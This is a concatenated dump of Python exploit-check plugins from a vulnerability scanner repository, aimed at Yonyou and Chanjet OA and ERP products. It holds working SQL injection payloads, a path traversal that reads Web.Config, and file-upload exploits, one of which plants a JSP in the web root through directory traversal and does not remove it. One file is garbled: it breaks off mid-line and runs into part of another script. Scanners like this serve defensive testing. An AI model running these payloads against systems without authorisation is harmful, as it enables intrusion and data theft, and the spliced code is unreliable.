--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_QueryService_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou KSOA host for SQL injection via com.sksoft.bill.QueryService.

    Sends one GET to ``/com.sksoft.bill.QueryService`` with a raw SQL
    statement in the ``content`` parameter and flags the target when the 200
    response body contains ``e10adc3949ba59abbe56e057f20f883e`` (MD5 of
    ``123456``).

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'close'
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/com.sksoft.bill.QueryService?service=query&content=SELECT%20HashBytes('md5','123456');")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_linkadd_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou KSOA host for SQL injection via linkadd.jsp.

    Sends one GET to ``/linksframe/linkadd.jsp`` with a UNION-based payload in
    ``id`` and flags the target when the 200 response body contains
    ``e10adc3949ba59abbe56e057f20f883e`` (MD5 of ``123456``).

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友时空KSOA-linkadd.jsp存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept': '*/*',
        'Connection': 'Keep-Alive'
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/linksframe/linkadd.jsp?id=666666%27+union+all+select+null%2Cnull%2Csys.fn_sqlvarbasetostr%28HashBytes%28%27MD5%27%2C%27123456%27%29%29%2Cnull%2Cnull%2C%27")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/KSOA/yongyou_ksoa_magefield_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou KSOA host for SQL injection via the imagefield servlet.

    Sends one GET to ``/servlet/imagefield`` with a UNION-based payload in
    ``sKeyvalue`` and flags the target when the 200 response body contains
    ``c4ca4238a0b923820dcc509a6f75849b`` (MD5 of ``1``).

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友时空KSOA-imagefield接口存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.get(vurl, headers=headers)
        if response.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/__pycache__/yongyou_government_affairs_FileDownload_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/__pycache__/yongyou_government_affairs_FileDownload_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/__pycache__/yongyou_u9_PatchFile_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_CheckMutex_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_CheckMutex_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_DownloadProxy_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_DownloadProxy_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_Edit_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_Edit_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_InitServerInfo_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_InitServerInfo_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_RRATableController_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_RRATableController_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_create_site_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_create_site_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_login_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/changjietong/__pycache__/yongyou_changjietong_login_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/yongyou_changjietong_CheckMutex_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou Chanjet T+ host for SQL injection via the CheckMutex AJAX method.

    POSTs a JSON document (sent as a raw string; no JSON Content-Type is set)
    whose ``accNum`` field carries a boolean-based payload to the
    ``MultiCompanyController`` AjaxPro endpoint.  The target is flagged when
    the 200 response body contains ``qvpxq``, the marker the payload builds
    from ``CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)``.

    Args:
        url: Base URL of the target; the probe path is joined onto it.

    Returns:
        The result dict with ``name``, ``url``, ``vulnerable`` and -- only when
        the indicator matched -- ``verify`` (the full probe URL).
    """
    relsult = {
        'name': '用友畅捷通-TPlus-CheckMutex存在sql注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0'
    }
    data = '''{"accNum": "3' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab", "functionTag": "SYS0104", "url": ""}'''
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex")
    try:
        # No timeout: an unresponsive host can stall this call indefinitely.
        response = requests.post(vurl, headers=headers, data=data)
        if response.status_code == 200 and 'qvpxq' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the ``if`` above, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return relsult

    except:
        # Bare except: any failure (connection error, unexpected exception,
        # even KeyboardInterrupt) is reported as "not vulnerable".
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/changjietong/yongyou_changjietong_DownloadProxy_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | def verify(url):
5 | relsult = {
6 | 'name': '用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞',
7 | 'vulnerable': False,
8 | 'url': url
9 | }
10 | headers = {
11 | 'X-Ajaxpro-Method': 'GetStoreWarehouseByStore',
12 | 'User-Agent': 'Java/1.8.0_381',
13 | 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
14 | 'Connection': 'close'
15 | }
16 | vurl = urllib.parse.urljoin(url, "tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config")
17 | try:
18 | response = requests.get(vurl, headers=headers)
19 | if response.status_code == 200 and '
16 |
17 |
18 |
19 | ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))--
20 |
21 |
22 | '''
23 | vurl = urllib.parse.urljoin(url, "/services/operOriztion")
24 | try:
25 | response = requests.post(vurl, headers=headers, data=data)
26 | if response.status_code == 200 and 'e10adc3949ba59abbe56e057f20f883e' in response.text:
27 | relsult['vulnerable'] = True
28 | relsult['verify'] = vurl
29 | return relsult
30 |
31 | except:
32 | return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/grp-u8/yongyou_grp-u8_proxy_xxe-sqli_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re, time
3 | import urllib, random, string
4 |
def verify(url: str) -> dict[str, str | bool]:
    """Scanner plugin: check a Yonyou GRP-U8 host for SQL injection through the /Proxy XML endpoint.

    Two POSTs to ``/Proxy`` with a form body built from ``data``: the first
    substitutes ``select @@version`` and requires a 200 response matching
    ``Microsoft SQL Server``; the second substitutes a random 6-character
    marker and requires the response to match both ``错误代码`` and that
    marker.  Only then is the target flagged.

    Args:
        url: Base URL of the target; ``/Proxy`` is joined onto it.

    Returns:
        The result dict with ``name`` and ``vulnerable``.  Unlike the sibling
        plugins this one records neither ``url`` nor ``verify``.
    """
    result = {
        'name': '用友 GRP-U8 Proxy XXE-SQL注入漏洞',
        'vulnerable': False
    }
    sqli_payload = "select @@version"
    # Marker used to tell a reflected echo from a coincidental match; drawn
    # from letters and digits only, so it is safe to pass to re.search unescaped.
    randstr = ''.join(random.sample(string.digits + string.ascii_letters, 6))
    timeout = 5
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    # Relies on urllib.parse already being imported elsewhere; a bare
    # ``import urllib`` does not import the submodule.
    vurl = urllib.parse.urljoin(url, "/Proxy")
    # NOTE(review): this literal looks like it lost its XML markup in extraction
    # (the token run ``XML AS_DataRequest ... Data{0}`` reads like stripped
    # tags); compare against the repository file before trusting it.
    data = 'cVer=9.8.0&dp=XML AS_DataRequest ProviderNameDataSetProviderData Data{0} '
    try:
        # verify=False disables TLS certificate validation for both requests,
        # so an on-path party could tamper with the responses being matched.
        rep = requests.post(vurl, headers=headers, timeout=timeout, data=data.format(sqli_payload), verify=False)
        if rep.status_code == 200 and re.search("Microsoft SQL Server", rep.text):
            rep2 = requests.post(vurl, headers=headers, timeout=timeout, data=data.format(randstr), verify=False)
            if re.search("错误代码", rep2.text) and re.search(randstr, rep2.text):
                result['vulnerable'] = True
        # NOTE(review): this return's indentation was lost in extraction; if it
        # actually sits inside the inner ``if``, a clean target makes verify()
        # return None instead of the result dict -- confirm against the repo.
        return result
    except:
        # Bare except: any failure (timeout, connection error, unexpected
        # exception, even KeyboardInterrupt) is reported as "not vulnerable".
        return result
28 |
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc-find-web_fileread.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc-find-web_fileread.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_FileManager_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_FileManager_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_avatar_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_avatar_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_aveXmlToFIleServlet_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_aveXmlToFIleServlet_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_bill_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_bill_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_blobRefClassSea_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_blobRefClassSea_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_downCourseWare_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_downCourseWare_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_download_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_file-receive-servlet_fileupload_2021.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_file-receive-servlet_fileupload_2021.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileserver_loginbypass.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileserver_loginbypass.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_grouptemplet_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_grouptemplet_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_importhttpscer_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_importhttpscer_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_jsinvoke_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_jsinvoke_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryPsnInfo_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryPsnInfo_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryStaffByName_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_queryStaffByName_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_querygoodsgridbycode_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_querygoodsgridbycode_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_rce_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_rce_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_runStateServlet_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_runStateServlet_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_saveImageServlet_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_saveImageServlet_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_showcontent_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_showcontent_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_soapFormat_xxe.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_soapFormat_xxe.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadChunk _fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadChunk _fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadControl_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_uploadControl_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_warningDetailInfo_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_warningDetailInfo_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_workflowImageServlet_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/yongyou/nc/__pycache__/yongyou_nc_workflowImageServlet_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc-find-web_fileread.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
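def verify(url):
    """Check a Yongyou NC host for the ``/NCFindWeb`` arbitrary file read.

    Two requests are made: the landing page is fetched first and must look
    like an NC install (``ufida`` somewhere in the body); only then is
    ``NCFindWeb`` asked for ``filename=/``, whose directory listing is
    expected to name ``.jsp`` files.

    Args:
        url: Base URL of the target (scheme + host[:port]).

    Returns:
        dict with ``name``, ``vulnerable`` (bool), ``url`` and, on a hit,
        ``verify`` (the probing URL). Network failures and timeouts are
        reported as ``vulnerable=False`` rather than raised.
    """
    result = {
        'name': '用友NC 任意文件读取(/NCFindWeb)',
        'vulnerable': False,
        'url': url,
    }
    timeout = 3
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ",
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    payload = '/NCFindWeb?service=IPreAlertConfigService&filename=/'
    vurl = urllib.parse.urljoin(url, payload)
    try:
        fingerprint = requests.get(url, headers=headers, timeout=timeout, verify=False)
        if fingerprint.status_code == 200 and re.search("ufida", fingerprint.text):
            listing = requests.get(vurl, headers=headers, timeout=timeout, verify=False)
            # Fix: the original tested the *fingerprint* body (rep.text) for
            # ".jsp", so any NC landing page that mentioned a .jsp flagged the
            # host; the listing response is what proves the file read.
            if listing.status_code == 200 and re.search(r".+\.jsp", listing.text):
                result['vulnerable'] = True
                result['verify'] = vurl
        return result
    except requests.RequestException:
        # Connection errors, timeouts and bad URLs mean "not confirmed".
        # Narrower than the original bare except, which also hid programming
        # errors and KeyboardInterrupt.
        return result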
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_FileManager_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
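def verify(url):
    """Check the Yongyou NC ``FileManager`` upload for path-traversal file write.

    Uploads a small JSP that prints a random marker into ``webapps/nc_web``
    via a ``..%5C`` traversal in ``billitem``, then fetches the file from the
    web root and looks for the marker.

    Side effects: on a vulnerable host this leaves ``<random>.jsp`` in the
    web root. The scanner does not clean it up.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (URL of the uploaded file). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC系统FileManager接口存在任意文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Content-Type': 'multipart/form-data;boundary=d0b7a0d40eed0e32904c8017b09eb305'
    }
    name_token = generate_random_str(6)
    marker = generate_random_str(15)
    # NOTE(review): the body uses LF line endings; strict multipart parsers
    # expect CRLF. Left as the author had it - confirm against a live target
    # before changing.
    data = f'''--d0b7a0d40eed0e32904c8017b09eb305
Content-Disposition: form-data; name="file"; filename="{name_token}.jsp"
Content-Type: text/plain

<%out.print("{marker}");%>
--d0b7a0d40eed0e32904c8017b09eb305--'''
    vurl = urllib.parse.urljoin(url, "/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C")
    # urljoin instead of string concatenation so a base URL with a trailing
    # slash does not produce "//<name>.jsp".
    check_url = urllib.parse.urljoin(url, f'/{name_token}.jsp')
    try:
        upload = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if upload.status_code == 200:
            fetched = requests.get(check_url, headers=headers, timeout=timeout)
            if fetched.status_code == 200 and marker in fetched.text:
                result['vulnerable'] = True
                result['verify'] = check_url
        return result
    except requests.RequestException:
        return result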
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_avatar_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
5 |
6 |
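def verify(url):
    """Check the Yongyou NC ``/uapim/upload/avatar`` endpoint for JSP upload.

    Posts a multipart body whose part is named ``111.jsp`` with random text
    content and treats an HTTP 200 containing ``true`` as a positive.

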